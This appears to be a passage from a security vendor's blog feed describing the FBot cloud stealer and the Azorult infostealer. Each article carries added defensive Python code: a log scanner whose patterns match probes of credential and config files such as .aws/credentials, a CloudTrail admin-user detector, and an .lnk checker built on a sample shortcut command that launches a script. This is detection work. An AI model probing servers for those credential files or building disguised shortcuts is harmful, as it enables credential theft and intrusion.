  2. Update Your System
    Keeping your operating system and security software up-to-date can prevent bootkit malware from infecting your computer. Pay attention to firmware updates as well: although rare, UEFI/BIOS vulnerabilities exist, too, and may be exploited in different scenarios.
  3. Use antivirus software
    While antivirus software can’t detect all bootkit malware, it can prevent such an infection in its early stage. Advanced control systems may also be useful for detecting the threats that integrate on such a low level.
  4. Be cautious when downloading software
    It is crucial to download software from trusted sources only, especially when we talk about hardware control utilities and drivers. Those two integrate deep enough into the system to allow their exploitation for bootkit injection.
  5. Use a hardware-based solution
    Hardware-based solutions, such as a Trusted Platform Module (TPM), can help prevent bootkit malware by ensuring that only trusted software is loaded during the boot process.

Novice FBot Stealer Targets Cloud Services
https://gridinsoft.com/blogs/fbot-stealer-cloud-services/
Tue, 16 Jan 2024 15:57:11 +0000

Researchers report about a new malware strain dubbed FBot. This Python-based malicious program appears to be a unique tool in cybercriminals’ arsenal. Its uniqueness is due to its targeting of web and cloud services. Deeper analysis reveals that it was potentially made for a specific cybercrime group or for the use in specific attacks.

FBot Targets AWS, Twilio and Office365

FBot is a Python-based hacking tool that was recently detected by SentinelOne analysts, particularly in its targeting of cloud services and payment platforms. FBot’s primary function is to hijack cloud, SaaS, and web services, with a secondary focus on obtaining accesses for further attacks. Among its most noteworthy features are credential harvesting capabilities, essential for initial access and potentially lucrative through the sale to other cybercriminals. FBot shares some commonalities with typical stealers, particularly in its functionalities related to credential harvesting and account hijacking.

Image: Console control window of FBot. Source: SentinelOne

Distinct from other infostealer malware families, FBot does not lean on the commonly used Androxgh0st code. Instead, it carves its own path, sharing functional and design similarities with the Legion cloud infostealer. Its smaller footprint suggests private development and a targeted distribution strategy. It also comes with extensive capabilities, including tools for hijacking AWS accounts and credential harvesting for spam attacks. Additionally, it has specialized functions to target PayPal and various SaaS accounts.

AWS Targeting

There are three functions in FBot that are designed specifically for attacking AWS accounts. Let’s look at each of them in more detail:

  • AWS API Key Generator
    This function of FBot creates artificial AWS API access keys. Think of it as trying to cut duplicate keys for a lock without having the original: it randomly generates keys in the hope of hitting a combination that grants access to an AWS account. If it succeeds, unauthorized users can access the services without the activity being visible to administrators.
  • Mass AWS Checker
    This part of FBot inspects AWS account properties, permissions and services. In particular, it looks into the email configurations of AWS Simple Email Service, focusing on email sending capabilities. Moreover, it takes a step further by trying to set up a new user within the AWS account with administrative access. Such functionality may further be useful for performing massive email spam campaigns.
  • AWS EC2 Checker
    One more function checks the AWS EC2 service permissions and capabilities of the compromised account. FBot checks what resources the account has available, which could be useful for someone planning to utilize these resources without authorization. What they are used for afterwards may vary, as spare computing power has extremely versatile applications.

Exploiting Payment Services and SaaS Platforms

FBot’s targeting of SaaS and payment services is multifaceted. It includes a feature for PayPal account validation, termed “paypal_validator,” which checks whether an email is linked to a PayPal account. This is executed by sending a request to a hardcoded URL, uniquely using a Lithuanian fashion designer’s website for authentication. This may enable transaction hijacking or similar mischievous activities.

Additionally, FBot targets several SaaS platforms, including Sendgrid and Twilio. For Sendgrid, it has a feature to generate API keys, while for Twilio, it takes input in the form of an SID and Auth Token. Similarly to AWS SES, hijacked Sendgrid accounts may further be used in impersonation email scams. Meanwhile, by dumping Twilio SID/Auth Token data, the malware provides its operators with quite a bit of information about the account: currency, balance, connected phone numbers, etc.

Web Framework Vulnerabilities

FBot’s capabilities in targeting web frameworks are focused on exploiting vulnerabilities in various environments. It has a feature for validating whether URLs host a Laravel environment file and extracting credentials from these files, which gives FBot potential access to sensitive configuration information. Additionally, it includes a Hidden Config Scanner, which sends HTTP GET requests to several PHP, Laravel, and AWS-related URIs looking for stored configuration values. This scanner parses responses for keys and secrets related to a range of services, making it a potent tool for extracting valuable data from compromised web frameworks.
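On the defending side, the probes described above leave a recognizable trail in web server access logs. The following is an added example (not code from the original post or from SentinelOne) that parses combined-format log lines, groups requests for configuration files by client IP and escalates when such a request was actually answered with a 2xx; the log lines are constructed, and the probed paths other than the Laravel `.env` file are an assumed sample rather than FBot’s real URI list.

```python
import re
from collections import defaultdict

# Constructed sample of combined-format web server access log lines (not real traffic).
# 203.0.113.7 behaves like a config scanner; 198.51.100.4 is ordinary browsing.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jan/2024:15:57:01 +0000] "GET /.env HTTP/1.1" 404 153 "-" "python-requests/2.31.0"
203.0.113.7 - - [16/Jan/2024:15:57:01 +0000] "GET /config/.env HTTP/1.1" 404 153 "-" "python-requests/2.31.0"
203.0.113.7 - - [16/Jan/2024:15:57:02 +0000] "GET /.aws/credentials HTTP/1.1" 404 153 "-" "python-requests/2.31.0"
203.0.113.7 - - [16/Jan/2024:15:57:02 +0000] "GET /phpinfo.php HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
198.51.100.4 - - [16/Jan/2024:15:58:10 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Jan/2024:15:58:11 +0000] "GET /css/app.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Paths that expose configuration when served. The Laravel ".env" file is the one the post
# names; the other entries are an assumed sample, not FBot's actual URI list.
PROBE_PATTERNS = [
    re.compile(r"(^|/)\.env(\.[a-z]+)?$"),      # Laravel / dotenv files
    re.compile(r"(^|/)\.aws/credentials$"),     # AWS CLI credential file
    re.compile(r"(^|/)phpinfo\.php$"),          # PHP info page leaks environment variables
    re.compile(r"(^|/)\.git/config$"),          # exposed repository metadata
]

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore query strings
    return rec


def is_config_probe(path):
    return any(p.search(path) for p in PROBE_PATTERNS)


def scan_access_log(lines, threshold=3):
    """Group config-file probes by client IP.

    A client is reported when it probes at least `threshold` config paths (scanner behaviour)
    or when any probe returned 2xx, which means the server actually served a config file.
    """
    per_ip = defaultdict(lambda: {"probes": [], "exposed": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_config_probe(rec["path"]):
            continue
        per_ip[rec["ip"]]["probes"].append(rec["path"])
        if 200 <= rec["status"] < 300:
            per_ip[rec["ip"]]["exposed"].append(rec["path"])

    findings = []
    for ip, info in per_ip.items():
        if len(info["probes"]) >= threshold or info["exposed"]:
            findings.append({
                "ip": ip,
                "probe_count": len(info["probes"]),
                "exposed_paths": sorted(set(info["exposed"])),
                # a served config file means secrets may already be gone; treat as critical
                "severity": "critical" if info["exposed"] else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG.splitlines()):
        print(finding)
```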

Protective Measures

To combat FBot’s threats, it’s crucial to understand its indicators of compromise. These include specific SHA1 hashes and hardcoded AWS IAM usernames and passwords used by FBot. The fight against FBot isn’t just about detection; it’s also about proactive defense.

  • Employ comprehensive antivirus solutions that are regularly updated. Modern antivirus software is equipped with advanced detection capabilities to identify and neutralize malware like FBot. These tools often include real-time monitoring, heuristic analysis, and behavior-based detection, which can be particularly effective against new and evolving threats.
  • FBot may use spamming tactics or exploit network vulnerabilities to gain entry. For spam protection, a robust firewall acts like a vigilant gatekeeper, monitoring and controlling incoming and outgoing network traffic based on predetermined security rules. By setting up appropriate firewall rules, you can effectively block malicious traffic and unauthorized access attempts, reducing the risk of FBot infiltrating your network.
  • Organizations are advised to enable multi-factor authentication (MFA) for AWS services and set up alerts for any unusual activities, such as the creation of new user accounts or significant changes in SaaS configurations.
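The last recommendation, alerting on new user accounts, can be tied directly to the behaviour described in the Mass AWS Checker section: SES sending checks followed by the creation of a user with administrative access. The following is an added example (not the post’s or SentinelOne’s code) that runs such a rule over CloudTrail-style records; the events, access key IDs and IP addresses are constructed, while the event names and the AdministratorAccess policy ARN are the real CloudTrail/IAM identifiers.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
# SES read calls that reveal sending quota and verified identities ("can this account spam?").
SES_RECON = {"GetSendQuota", "ListIdentities", "GetAccountSendingEnabled"}

# Constructed CloudTrail-style records (field names follow CloudTrail, values are made up).
# Access key AKIA...0001 enumerates SES, then creates an admin user and issues it a key.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-16T15:57:11Z", "eventSource": "ses.amazonaws.com", "eventName": "GetSendQuota",
     "sourceIPAddress": "203.0.113.7", "userIdentity": {"accessKeyId": "AKIAEXAMPLE000000001"},
     "requestParameters": None},
    {"eventTime": "2024-01-16T15:57:12Z", "eventSource": "ses.amazonaws.com", "eventName": "ListIdentities",
     "sourceIPAddress": "203.0.113.7", "userIdentity": {"accessKeyId": "AKIAEXAMPLE000000001"},
     "requestParameters": {"identityType": "EmailAddress"}},
    {"eventTime": "2024-01-16T15:57:20Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateUser",
     "sourceIPAddress": "203.0.113.7", "userIdentity": {"accessKeyId": "AKIAEXAMPLE000000001"},
     "requestParameters": {"userName": "backup-svc"}},
    {"eventTime": "2024-01-16T15:57:22Z", "eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "sourceIPAddress": "203.0.113.7", "userIdentity": {"accessKeyId": "AKIAEXAMPLE000000001"},
     "requestParameters": {"userName": "backup-svc", "policyArn": ADMIN_POLICY}},
    {"eventTime": "2024-01-16T15:57:25Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "sourceIPAddress": "203.0.113.7", "userIdentity": {"accessKeyId": "AKIAEXAMPLE000000001"},
     "requestParameters": {"userName": "backup-svc"}},
    # Ordinary provisioning by a different principal: a user is created but gets no admin policy.
    {"eventTime": "2024-01-16T09:00:00Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateUser",
     "sourceIPAddress": "198.51.100.4", "userIdentity": {"accessKeyId": "AKIAEXAMPLE000000002"},
     "requestParameters": {"userName": "ci-deploy"}},
]


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _params(event):
    return event.get("requestParameters") or {}


def detect_admin_user_creation(events, window=timedelta(minutes=10)):
    """Alert when one caller creates a user, attaches AdministratorAccess to it and issues it an
    access key within `window`; also report how many SES recon calls that caller made beforehand."""
    alerts = []
    by_caller = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_caller[e["userIdentity"].get("accessKeyId", "unknown")].append(e)

    for caller, evs in by_caller.items():
        ses_calls = [e for e in evs if e["eventSource"] == "ses.amazonaws.com" and e["eventName"] in SES_RECON]
        for created in (e for e in evs if e["eventName"] == "CreateUser"):
            user = _params(created).get("userName")
            deadline = _ts(created) + window
            follow_ups = [e for e in evs if _ts(created) <= _ts(e) <= deadline and _params(e).get("userName") == user]
            got_admin = any(e["eventName"] == "AttachUserPolicy" and _params(e).get("policyArn") == ADMIN_POLICY
                            for e in follow_ups)
            got_key = any(e["eventName"] == "CreateAccessKey" for e in follow_ups)
            if got_admin and got_key:
                alerts.append({
                    "caller": caller,
                    "source_ip": created["sourceIPAddress"],
                    "new_user": user,
                    "ses_recon_before": sum(1 for e in ses_calls if _ts(e) < _ts(created)),
                    "severity": "high",
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_admin_user_creation(SAMPLE_EVENTS):
        print(alert)
```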

AzorUlt Stealer Is Back In Action, Uses Email Phishing
https://gridinsoft.com/blogs/azorult-stealer-back-in-action/
Tue, 16 Jan 2024 12:22:45 +0000

Cybersecurity experts have stumbled upon the eight-year-old Azorult malware. This malware steals information and collects sensitive data, and had been dormant since late 2021. But will the old dog keep up with new tricks?

Azorult Malware Resurfaces After 2 Years

Recent research in the cyber threat landscape has brought to light concerning news about the Azorult malware. First identified in 2016, this malware gained quite a reputation back in the day. Among its most noticeable campaigns was spreading together with STOP/Djvu ransomware. However, its activity had been declining since early 2020, with the activity curve going flat in late 2021.

Being a stealer from the mid-2010s, it originally carried functionality that suited the times. Azorult specializes in stealing sensitive information such as browsing history, cookies, and login credentials. No crypto wallets, no session or 2FA tokens: those were not that valuable back in the day.

Among the key changes in the resurfaced version are more sophisticated and stealthy methods, which could make it very difficult to detect. It also uses a new infection chain and uses RAM as a springboard for deploying and executing the entire payload. Researchers stumbled upon shortcut files masquerading as PDF files, eventually leading to Azorult infecting the device. As for the distribution method, experts suggest it relies on classic means like email phishing.

Image: Malicious shortcut file

What is Azorult Malware?

The Azorult malware is spyware that can steal various data types, including credentials for applications and cryptocurrency wallets. It is known for its capabilities in harvesting sensitive data from infected systems. Azorult can also download and execute additional payloads, increasing its threat to compromised systems.

In its latest variant, Azorult uses process injection and “Living Off the Land” (LotL) techniques to evade detection by security tools and is primarily sold on Russian underground hacker forums. Data stolen with Azorult is also sold on Russian Dark Web marketplaces. In addition to stealing information, the malware captured data for a service that sells ready-made virtual identities. This included as much detailed data as possible about users’ online behavior: history of website visits, information about the operating system, browser, installed plugins, etc.

In particular, researchers found that 90% of all digital footprints offered on the infamous Genesis Market were associated with Azorult. However, in February 2020, Google released a Chrome update that enforced the use of AES-256 for password encryption. This affected Azorult’s ability to retrieve passwords from Chrome. As the development of AZORult had been discontinued in 2018, this release was considered the “death” of AZORult, impacting Genesis’s business as well.

Azorult Uses Email Spam and LNK Files

The reviewed sample of Azorult, as I mentioned above, came as an .lnk file disguised as a PDF document through a double-extension trick. A file named citibank_statement_dec_2023.lnk triggers a sequence of events that downloads and executes a JavaScript file from a remote server. The JavaScript file downloads two PowerShell scripts, one of which retrieves an executable file and initiates a new thread to execute the injected code. The loader terminates if the user’s language code matches specific codes linked to Russia, the most probable region of its developers. The final payload is, obviously, the Azorult infostealer.

Image: Azorult Infection Chain

Upon execution, it generates a unique identifier for the victim and collects system information, including crypto wallets. Azorult terminates execution if certain conditions are met, such as the presence of a mutex or a file named “password.txt” on the Desktop. It also checks for specific machine names and usernames on the victim’s system. If any of the checks return true, the binary terminates. Azorult captures screenshots and targets multiple applications. The data is compressed, encrypted, and sent to a remote server.
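Shortcuts that pose as documents can be triaged before anyone double-clicks them, because the target path, command-line arguments and icon source are stored as plain strings inside the .lnk file. The following is an added example (not code from the original post or from the cited researchers) that parses those StringData fields as laid out in Microsoft’s MS-SHLLINK specification and flags a shortcut that borrows a document viewer’s icon while launching a script host; the two sample shortcuts, including their command line and icon path, are constructed placeholders and not the real loader’s.

```python
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORK_DIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))

# Targets that mean "run a program or script", not "open a document".
SCRIPT_HOSTS = ("cmd.exe", "powershell", "wscript", "cscript", "mshta", "rundll32")
# Icon sources that make a shortcut look like a document.
DOCUMENT_ICON_HINTS = ("acrobat", "pdf", "winword", "excel", ".docx", ".xlsx")


def parse_lnk(data):
    """Extract the StringData fields (name, target path, arguments, icon) from a .lnk file."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                     # skip LinkTargetIDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # skip LinkInfo (4-byte size that includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, key in STRING_FIELDS:              # each string: 2-byte char count, then the chars
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields


def assess_shortcut(data):
    """Flag a shortcut that looks like a document but launches a script host or interpreter."""
    fields = parse_lnk(data)
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    icon = fields.get("icon_location", "").lower()
    launches_host = any(h in target for h in SCRIPT_HOSTS)
    doc_icon = any(h in icon for h in DOCUMENT_ICON_HINTS)
    long_args = len(fields.get("arguments", "")) > 100
    reasons = [text for flag, text in ((launches_host, "target launches a script host or interpreter"),
                                       (doc_icon, "icon borrowed from a document viewer"),
                                       (long_args, "unusually long command line")) if flag]
    # A script-host target alone can be a legitimate admin shortcut; masquerading needs a second sign.
    return {"fields": fields, "suspicious": launches_host and (doc_icon or long_args), "reasons": reasons}


def build_lnk(relative_path, arguments, icon_location):
    """Build a minimal Unicode shortcut carrying only StringData, to construct test samples offline."""
    header = bytearray(LNK_HEADER_SIZE)
    struct.pack_into("<I", header, 0, LNK_HEADER_SIZE)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location))
    return bytes(header) + body


# Constructed samples. The command line and icon path are placeholders, not the real loader's.
MASQUERADING_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                             r"/c wscript.exe %TEMP%\statement.js",
                             r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe")
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "", "")

if __name__ == "__main__":
    for name, sample in (("masquerading", MASQUERADING_LNK), ("benign", BENIGN_LNK)):
        print(name, assess_shortcut(sample))
```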

Safety Recommendations

Since human error is mostly to blame, the most important recommendation is to beware of phishing. To elaborate, the following points will be helpful:

  • Unsolicited Emails. Always be skeptical and cautious of emails from unknown sources, especially those that request personal information or urge you to click on a link.
  • Verify Email Sources. Before responding or clicking any links, verify the sender’s email address and ensure it’s legitimate. Don’t click on links in emails, especially if they seem suspicious or too good to be true.
  • Educate Yourself. Stay informed about phishing methods and various phishing-based scam techniques.
